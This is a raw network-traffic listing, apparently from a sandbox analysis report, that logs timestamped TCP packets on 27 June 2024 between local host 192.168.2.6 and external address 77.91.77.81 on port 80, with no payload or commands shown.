                                                                Jun 27, 2024 05:59:06.580807924 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.580820084 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.580853939 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.581094980 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.581115961 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.581131935 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.581146002 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.581152916 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.581165075 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.581193924 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.581233978 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.581248045 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.581262112 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.581284046 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.581307888 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.581319094 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.581336975 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.581351042 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.581367970 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.581371069 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.581383944 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.581476927 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.581829071 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.581845045 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.581866026 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.581880093 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.581891060 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.581901073 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.581913948 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.581923008 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.581934929 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.581945896 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.581960917 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.581968069 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.581978083 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.581990004 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.582006931 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.582020044 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.582029104 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.582041025 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.582055092 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.582062960 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.582077026 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.582087040 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.582099915 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.582122087 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.582371950 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.582386971 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.582425117 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.582444906 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.582474947 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.582489967 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.582503080 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.582513094 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.582525969 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.582540035 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.582550049 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.582562923 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.582571983 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.582585096 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.582600117 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.582608938 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.582622051 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.582634926 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.582665920 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.583148956 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.583163977 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.583178043 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.583198071 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.583209038 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.583224058 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.583233118 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.583245993 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.583266973 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.583276033 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.583288908 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.583302021 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.583316088 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.583328009 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.583342075 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.583349943 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.583359957 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.583373070 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.583385944 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.583395004 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.583410978 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.583417892 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.583430052 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.583440065 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.583465099 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.583472967 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.583479881 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.583492041 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.583502054 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.583525896 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.583996058 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.584009886 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.584023952 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.584037066 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.584043026 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.584058046 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.584064007 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.584076881 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.584085941 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.584098101 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.584114075 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.584124088 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.584136009 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.584145069 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.584170103 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.636269093 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.636302948 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.636318922 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.636333942 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.636348963 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.636362076 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.636382103 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.636396885 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.636409044 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.636435986 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.636461020 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.659379959 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.659411907 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.659441948 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.659456015 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.659471989 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.659482956 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.659498930 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.659506083 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.659516096 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.659529924 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.659543991 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.659569979 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.659604073 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.659621954 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.659651995 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.659672022 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.659779072 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.659825087 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.659833908 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.659847021 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.659879923 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.659898996 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.659918070 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.659934044 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.659960985 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.659987926 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.660011053 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.660024881 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.660038948 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.660048962 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.660068989 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.660098076 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.671066999 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.671097994 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.671113014 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.671124935 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.671147108 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.671154022 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.671170950 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.671179056 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.671190977 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.671205997 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.671220064 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.671253920 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.671853065 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.671875000 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.671890974 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.671905041 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.671921015 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.671931028 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.671943903 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.671966076 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.671977043 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.671996117 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.672004938 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.672017097 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.672034979 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.672049046 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.672061920 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.672072887 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.672091007 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.672097921 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.672107935 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.672118902 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.672133923 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.672142982 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.672158957 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.672168016 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.672189951 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.672202110 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.672241926 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.672280073 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.672333002 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.672347069 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.672360897 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.672374010 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.672391891 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.672399998 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.672413111 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.672427893 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.672435999 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.672450066 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.672466040 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.672489882 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.672498941 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.672508955 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.672563076 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.672816038 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.672832012 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.672846079 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.672863960 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.672872066 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.672885895 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.672895908 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.672909975 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.672919035 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.672941923 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.672949076 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.672961950 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.672971964 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.672986031 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.673010111 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.673239946 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.673254967 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.673275948 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.673290014 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.673300028 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.673310041 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.673329115 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.673337936 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.673351049 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.673361063 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.673381090 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.673394918 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.673405886 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.673405886 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.673438072 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.673687935 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.673702955 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.673718929 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.673733950 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.673742056 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.673759937 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.673769951 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.673783064 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.673791885 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.673804998 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.673820019 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.673826933 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.673840046 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.673850060 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.673861980 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.673877001 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.673885107 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.673897982 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.673907042 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.673918962 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.673933983 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.673945904 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.673960924 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.673969984 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.673993111 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.674010992 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.674565077 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.674581051 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.674595118 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.674608946 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.674618959 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.674638033 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.674644947 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.674658060 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.674668074 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.674679995 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.674695015 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.674701929 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.674722910 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.674734116 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.674746990 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.674756050 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.674772024 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.674783945 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.674796104 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.674807072 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.674824953 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.674830914 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.674845934 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.674853086 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.674861908 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.674875021 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.674889088 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.674897909 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.674911976 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.674932957 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.675200939 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.675216913 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.675236940 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.675261021 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.675271034 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.675282001 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.675293922 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.675312042 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.675318956 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.675331116 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.675344944 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.675360918 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.675368071 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.675381899 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.675401926 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.675401926 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.675403118 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.675419092 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.675427914 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.675442934 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.675451994 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.675467968 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.675477028 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.675494909 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.675513983 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.727205992 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.727247000 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.727266073 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.727325916 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.727339983 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.727396011 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.727411985 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.727478981 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.727549076 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.750513077 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.750528097 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.750541925 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.750555992 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.750571012 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.750586033 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.750634909 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.750646114 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.750662088 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:06.750673056 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.750696898 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:06.750744104 CEST4972980192.168.2.677.91.77.81
